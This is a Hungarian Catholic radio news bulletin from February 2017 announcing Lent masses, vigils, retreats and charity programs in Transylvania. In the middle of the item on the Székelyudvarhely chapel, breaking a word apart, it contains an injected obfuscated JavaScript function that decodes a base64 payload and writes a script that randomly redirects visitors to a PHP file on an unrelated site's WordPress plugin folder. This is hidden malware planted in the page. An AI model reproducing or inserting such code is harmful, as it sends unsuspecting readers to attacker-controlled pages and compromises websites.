2017. február 27. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a holnapi nap folyamán Székelyszálláson tartják az örökös szentségimádási napot. Éljünk minél többen a lehetőséggel, járuljunk az Oltáriszentségben jelen levő Krisztus elé, és könyörögjünk családjainkért, a békéért és a lelkek megmentéséért.

Hamvazószerda
2017. március 1-én, Hamvazószerdán elkezdődik a Húsvétot megelőző nagyböjti időszak. Az elnevezését a bűnbánat és a vezeklés őskeresztény jeleként szolgáló hamuról kapta: az előző év Virágvasárnapján megszentelt barka hamujával a pap ezen a napon keresztet rajzol a hívek homlokára, miközben ezt mondja: „Emlékezz, ember, hogy porból lettél és porrá leszel!”
A nagyváradi székesegyházban ezen a napon hétköznapi program szerint lesznek a szentmisék: reggel hét és este hat órakor, de a hamvazás szentelményét nagyböjt I. vasárnapjának szentmiséin is kiszolgáltatják.
A csíksomlyói kegytemplomban hamvazással egybekötött szentmisék reggel nyolc, délelőtt tizenegy és este hat órától lesznek.
A szatmárnémeti székesegyházban a szentmisék reggel hét, kilenc és este hat órától lesznek.

Nagyböjti ifjúsági imaórák
Nagyböjtben, a hagyománynak megfelelően a szatmárnémeti katolikus ifjúság megszervezi a vasárnap-esti imaórákat. Az első ilyen találkozásra március 5-én, a Szent Család templomban kerül sor. Ezt követően a helyszínek március 12-én a Szentlélek templom, 19-én a Kis Szent Teréz templom, 26-án a Hildegárda templom, április 2-án pedig a Szent Antal templom – minden imaóra este hét órától kezdődik. Korosztálytól függetlenül várják a híveket közös elmélkedésre, imára, énekre.

Ökumenikus világimanap
Dél- és Délkelet Ázsia egyetlen döntően keresztény szigetországáért, a Fülöp-szigeteki Köztársaságért imádkozik a világ 2017. március 3-án. Ezen a napon tartják világszerte a Nők ökumenikus világimanapját, amelybe Erdélyben is egyre több nőszövetség kapcsolódik be.
„Hát igazságtalanul bánok én Veled?” hívó gondolatú ökumenikus világimanapi liturgiát idén a Fülöp-szigeteken élő nők állították össze.
Március 3-án, pénteken délután fél öt órától tartják a Szatmár-Szigetlankai református templomban a nemzetközi ökumenikus imanapot.
Székelyudvarhelyen a belvárosi református templomban szintén pénteken délután öt órakor kezdődik a nők ökumenikus imaórája. A nagykárolyi Szent Antal görögkatolikus templomban március 4-én, szombaton délután három órakor kezdődik a keresztény nők imaórája -tudtuk meg a RomKat.ro oldaláról.

Keresztény Agora Szatmárnémetiben
Környezetvédelmi témára gyűlnek össze a Keresztény Agora Kulturális Kör keretében, a Székesegyházi Plébánia szervezésében, március 4-én, szombaton délelőtt tizenegy órakor a székesegyházi Scheffler János Lelkipásztori központ dísztermében. Ez alkalommal Ferenc pápa „Laudato Si” enciklikáját mutatja be Kovács Sándor kolozsvári főesperes-plébános. Előadásának címe: Ferenc pápa a természetvédelem apostola – Assisi Szent Ferenc nyomában. Várnak minden érdeklődőt!

Nagyböjti virrasztás Sepsiszentgyörgyön
A sepsiszentgyörgyi Krisztus király plébániatemplomban a nagyböjtben minden péntekén este tíz órától virrasztást tartanak, mely a reggel fél hét órakor kezdődő szentmisével ér véget. Hívnak mindenkit, hogy minél többen kapcsolódjanak bele a közös imába. Rádiónk csak az első pénteki virrasztásokat  közvetíti élő adásban.

Csendkóstoló és Csendtanfolyam
A nagyböjt a bűnbánat ideje, és ezért ez jó alkalom az elcsendesedésre, az önmagunkba tekintésre. Ebben nyújt segítséget a közeljövőben sorra kerülő két csendes lelkigyakorlat. Az első, a Csendkóstoló melyet Csíksomlyón a ferences kolostor előadótermében tartanak március 3-tól 4-ig. Célja, a csendes, szemlélődő imamód megismerése. A másik: Csendtanfolyam néven, egy egyhetes lelkigyakorlat Ivóban, ahol ugyancsak a szemlélődő imamódba kaphatnak egy elmélyültebb bevezetést. A lelkigyakorlatot Józsa Csaba mentálhigiénés tanácsadó vezeti. Jelentkezni lehet Facebook-on a Csendtanfolyam nevű közösségi oldalon keresztül, illetve e-mailen: a csendtanfolyam@gmail.com címen.

Ferences Ifjúsági Téli Találkozó
A ferences rendtartomány az Assisi Szent Ferenc szellemét megismerni vagy elmélyíteni akaró fiatalok és gyerekek számára programsorozatot szervez, amelyet a március 3–5. között Désen tartott Fitt téli találkozó nyitja. További részletekért érdeklődni és jelentkezni a ferencesprogramok33@gmail.com e-mail címen,
vagy a 0746774701-es (Tibor testvér) telefonszámon lehet.

Időjárás: Holnap országszerte szeles időre készülhetünk. Eleinte kevesebb, délután több felhő lesz az égen, de késő estig számottevő csapadék nem várható. Enyhébb lesz a reggel, napközben pedig 12-18, délen néhol akár 19-20 fokot is mérhetünk. 

MRE – Hírszolgát, 2017. február 27.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Naszódon tartják az örökös szentségimádási napot. Éljünk minél többen a lehetőséggel, járuljunk az Oltáriszentségben jelen levő Krisztus elé, és könyörögjünk családjainkért, a békéért és a lelkek megmentéséért.

Gyermekgondozó képzés indul Csíkszeredában
A Gyulafehérvári Caritas gyermekgondozói képzést indít Csíkszeredában. Gyermekközösségekben dolgozóknak, otthoni gyermekfelügyelet iránt érdeklődőknek, kisgyermekes szülőknek ajánlják. Jelentkezési határidő február 28. Bővebb információ a www.caritas-ab.ro honlapon található.

Rövid terápiás foglalkozás szenvedélybetegeknek
A Bonus Pastor Alapítvány rövid terápiás foglalkozást szervez alkohol-, drog-, játékfüggők és egyéb szenvedélybetegséggel küzdők számára. A program 2017. március 6–17. között zajlik Mezőpanitban. A terápia lehetőség a szenvedélybetegséggel küzdők és családtagjaik számára a gyógyulásra és kapcsolataik rendezésére. A rövid távú terápián férfiak és nők, valamint felnőtt hozzátartozóik is részt vehetnek. Jelentkezni és a részletekről érdeklődni február 28-ig lehet. Mivel a helyek száma korlátozott, a résztvevőket jelentkezési sorrendben fogadják. Bővebb információk a www.bonuspastor.ro honlapon találhatók.

Engesztelő imavirrasztás Székelyudvarhelyen
Az erdélyi Mária Rádió székelyudvarhelyi stúdiójának kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, éjjel tizenegy órától szentmisét mutatnak be. Március 1-én hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek. A kápolnában minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van. Várják az Istent imádni, engesztelni vágyókat.

Szerdai párbeszédek Marosvásárhelyen
A Családpasztorációs Központ és a Familia Centrum szervezésében a Szerdai párbeszédek idei második találkozója március 1-én, este hat órától az Ama Deus cukrászdába lesz.
Az est témája: Nagymamák, anyák, lányok..generációkon át. Meghívottak: Becsky Borbála családterapeuta, dr. Csorvádi Szabó Zsuzsa fogorvos, anya és Henn Magdolna anya, nagymama. A beszélgetéssorozat program célja a család, a házasság erősítése, a lelki egészség védelme. A párkapcsolati témák mellett a még vagy már nem házasságban élőkhöz, fiatalokhoz vagy egyedülállókhoz is szól. A meghívott szakemberek az adott témában felvezetőket tartanak, ezt követően közös beszélgetésre hívják az érdeklődőket.

Ferences Ifjúsági Téli Találkozó
A ferences rendtartomány az Assisi Szent Ferenc szellemét megismerni vagy elmélyíteni akaró fiatalok és gyerekek számára programsorozatot szervez, amelyet a március 3–5. között Désen tartott Fitt téli találkozó nyitja. További részletekért érdeklődni és jelentkezni a ferencesprogramok33@gmail.com e-mail címen,
vagy  a 0746774701-es (Tibor testvér) telefonszámon lehet.

Hogyan olvassuk a Szentírást?
A Katolikus Magyar Bibliatársulat Hogyan olvassuk a Szentírást? címmel módszertani képzést szervez március 3–5. között Csíksomlyón a Jakab Antal Tanulmányi Házban. Egyéni és csoportos szentírásolvasáshoz érdekes, élményszerű módszereket mutatnak be, és egy-egy szentírási rész közös feldolgozásával el is sajátítják a jelenlevők. Jelentkezni február 28-ig lehet, délután három óra után a 0745 593 390-es telefonszámon vagy a benczedikati@hotmail.com e-mail címen.

Egy hónap az életért
A magát politikailag és felekezeti hovatartozás szempontjából semlegesnek nyilvánító „Egyetemi hallgatók az életért” nevet viselő egyesület 2017. március 1-31. között hirdeti meg az „Egy hónap az életért 2017. – Segítsd az anyát és gyermekét! Ők tőled függnek” programját. A rendezvénysorozatba, amelynek kimagasló pillanata a „Menetelés az életért” lesz március 25-én, több romániai város diákmozgalmai és civil szervezetei kapcsolódnak be. A szervezők egy országos projektet dolgoztak ki, amelyek a meg nem született magzat életjogának a védelmét, a nehéz helyzetbe került anyák megsegítését célozzák meg. A katolikus egyház egyik fő feladata az élet védelmezése, éppen ezért támogat minden olyan jóakaratú kezdeményezést, amely rejtett szándék nélkül az élethez való jog védelmezésére, ennek ismertetésére és terjesztésére irányul. Március 1-től a www.marsulpentruviata.ro honlapon lehet további információt szerezni az egyes városokban, helyi szinten megszervezett eseményekről.

Időjárás: Ma változóan, felhős-napos időre készülhetünk, helyenként alakulhat ki jelentéktelen eső, egy-egy gyenge zápor. Délkeleten ködös, párás időre kell számítani. Reggel helyenként még gyengén fagyhat, de délután már 9 és 15 fok között alakul a csúcshőmérséklet.

MRE - Hírszolgát, 2017. február 27.

About the author

maradmin

Leave a Comment